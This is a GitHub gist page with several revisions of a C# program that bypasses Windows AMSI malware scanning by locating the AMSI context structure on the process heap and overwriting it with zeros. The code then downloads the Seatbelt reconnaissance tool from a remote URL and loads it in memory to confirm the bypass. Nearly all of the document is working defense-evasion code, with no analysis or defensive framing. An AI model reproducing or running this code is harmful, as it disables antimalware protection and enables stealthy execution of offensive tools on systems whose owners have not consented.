-
-
Save mgeeky/238fcd91f106eb9665af89b4ce0f00c6 to your computer and use it in GitHub Desktop.
Revisions
-
wavvs revised this gist
Jan 20, 2022 . 1 changed file with 2 additions and 2 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -103,8 +103,8 @@ static void Main(string[] args) var addr = Marshal.ReadIntPtr(h.lpData, IntPtr.Size); if (addr == appNameAddr) { hContextAddr = h.lpData; Console.WriteLine("[*] Found HAMSICONTEXT address: 0x{0}", hContextAddr.ToString("X")); break; } } -
Jan 20, 2022 . 1 changed file with 9 additions and 7 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -74,11 +74,13 @@ static void Main(string[] args) IntPtr appNameAddr = IntPtr.Zero; IntPtr hContextAddr = IntPtr.Zero; string appName = "DotNet"; while (HeapWalk(heap, ref h)) { if ((h.wFlags & PROCESS_HEAP_ENTRY_WFLAGS.PROCESS_HEAP_ENTRY_BUSY) != 0 && h.cbData >= appName.Length * 2) { if (Marshal.PtrToStringUni(h.lpData) == appName) { appNameAddr = h.lpData; Console.WriteLine("[*] Found appName: 0x{0}", appNameAddr.ToString("X")); @@ -96,9 +98,9 @@ static void Main(string[] args) h.lpData = IntPtr.Zero; while (HeapWalk(heap, ref h)) { if ((h.wFlags & PROCESS_HEAP_ENTRY_WFLAGS.PROCESS_HEAP_ENTRY_BUSY) != 0 && h.cbData >= IntPtr.Size * 2) { var addr = Marshal.ReadIntPtr(h.lpData, IntPtr.Size); if (addr == appNameAddr) { hContextAddr = appNameAddr; @@ -115,12 +117,12 @@ static void Main(string[] args) } Console.WriteLine("[*] Corrupting HAMSICONTEXT (Win 11 is supported)"); var zero = new byte[IntPtr.Size * 3]; Marshal.Copy(zero, 0, hContextAddr, IntPtr.Size * 3); Console.WriteLine("[*] Checking bypass, loading Seatbelt"); var c = new WebClient(); Assembly.Load(c.DownloadData(@"https://raw.githubusercontent.com/Flangvik/SharpCollection/master/NetFramework_4.5_Any/Seatbelt.exe")); Console.WriteLine("[*] AMSI has been successfully bypassed!"); Console.ReadLine(); -
Jan 20, 2022 . 1 changed file with 11 additions and 3 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -10,7 +10,7 @@ using System.IO; using System.Net; namespace AmsiBypassHeap { internal class Program { @@ -98,15 +98,22 @@ static void Main(string[] args) { if ((h.wFlags & PROCESS_HEAP_ENTRY_WFLAGS.PROCESS_HEAP_ENTRY_BUSY) != 0 && h.cbData >= 16) { var addr = Marshal.ReadIntPtr(h.lpData, 8); if (addr == appNameAddr) { hContextAddr = appNameAddr; Console.WriteLine("[*] Found HAMSICONTEXT address: 0x{0}", h.lpData.ToString("X")); break; } } } if (hContextAddr == IntPtr.Zero) { Console.WriteLine("[*] Could not find HAMSICONTEXT"); return; } Console.WriteLine("[*] Corrupting HAMSICONTEXT (Win 11 is supported)"); var zero = new byte[24]; Marshal.Copy(zero, 0, hContextAddr, 24); @@ -116,6 +123,7 @@ static void Main(string[] args) Assembly.Load(c.DownloadData(@"https://raw.githubusercontent.com/Flangvik/SharpCollection/master/NetFramework_4.7_x64/Seatbelt.exe")); Console.WriteLine("[*] AMSI has been successfully bypassed!"); Console.ReadLine(); } } } -
Jan 19, 2022 .There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,121 @@ using System; using System.Collections.Generic; using System.Linq; using System.Text; using System.Threading.Tasks; using System.Runtime.InteropServices; using System.Reflection; using System.Diagnostics; using System.Threading; using System.IO; using System.Net; namespace BypassExperiments { internal class Program { [Flags] public enum PROCESS_HEAP_ENTRY_WFLAGS : ushort { PROCESS_HEAP_ENTRY_BUSY = 0x0004, PROCESS_HEAP_ENTRY_DDESHARE = 0x0020, PROCESS_HEAP_ENTRY_MOVEABLE = 0x0010, PROCESS_HEAP_REGION = 0x0001, PROCESS_HEAP_UNCOMMITTED_RANGE = 0x0002, } [StructLayoutAttribute(LayoutKind.Explicit)] public struct UNION_BLOCK { [FieldOffset(0)] public STRUCT_BLOCK Block; [FieldOffset(0)] public STRUCT_REGION Region; } [StructLayoutAttribute(LayoutKind.Sequential)] public struct STRUCT_BLOCK { public IntPtr hMem; public uint dwReserved1_1; public uint dwReserved1_2; public uint dwReserved1_3; } [StructLayoutAttribute(LayoutKind.Sequential)] public struct STRUCT_REGION { public uint dwCommittedSize; public uint dwUnCommittedSize; public IntPtr lpFirstBlock; public IntPtr lpLastBlock; } [StructLayoutAttribute(LayoutKind.Sequential)] public struct PROCESS_HEAP_ENTRY { public IntPtr lpData; public uint cbData; public byte cbOverhead; public byte iRegionIndex; public PROCESS_HEAP_ENTRY_WFLAGS wFlags; public UNION_BLOCK UnionBlock; } [DllImport("kernel32.dll", SetLastError = true)] static extern IntPtr GetProcessHeap(); [DllImport("kernel32.dll", SetLastError = true)] static extern bool HeapWalk(IntPtr hHeap, ref PROCESS_HEAP_ENTRY lpEntry); static void Main(string[] args) { // Initialize AMSI Assembly.Load(File.ReadAllBytes(@"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Build.dll")); IntPtr heap = GetProcessHeap(); PROCESS_HEAP_ENTRY h = new PROCESS_HEAP_ENTRY(); IntPtr appNameAddr = IntPtr.Zero; IntPtr hContextAddr = IntPtr.Zero; while (HeapWalk(heap, ref h)) { if ((h.wFlags & PROCESS_HEAP_ENTRY_WFLAGS.PROCESS_HEAP_ENTRY_BUSY) != 0 && h.cbData >= 12) { if (Marshal.PtrToStringUni(h.lpData) == "DotNet") { appNameAddr = h.lpData; Console.WriteLine("[*] Found appName: 0x{0}", appNameAddr.ToString("X")); break; } } } if (appNameAddr == IntPtr.Zero) { Console.WriteLine("[*] Could not locate appName"); return; } h.lpData = IntPtr.Zero; while (HeapWalk(heap, ref h)) { if ((h.wFlags & PROCESS_HEAP_ENTRY_WFLAGS.PROCESS_HEAP_ENTRY_BUSY) != 0 && h.cbData >= 16) { hContextAddr = Marshal.ReadIntPtr(h.lpData, 8); if (hContextAddr == appNameAddr) { Console.WriteLine("[*] Found HAMSICONTEXT address: 0x{0}", h.lpData.ToString("X")); break; } } } Console.WriteLine("[*] Corrupting HAMSICONTEXT (Win 11 is supported)"); var zero = new byte[24]; Marshal.Copy(zero, 0, hContextAddr, 24); Console.WriteLine("[*] Checking bypass, loading Seatbelt"); var c = new WebClient(); Assembly.Load(c.DownloadData(@"https://raw.githubusercontent.com/Flangvik/SharpCollection/master/NetFramework_4.7_x64/Seatbelt.exe")); Console.WriteLine("[*] AMSI has been successfully bypassed!"); } } }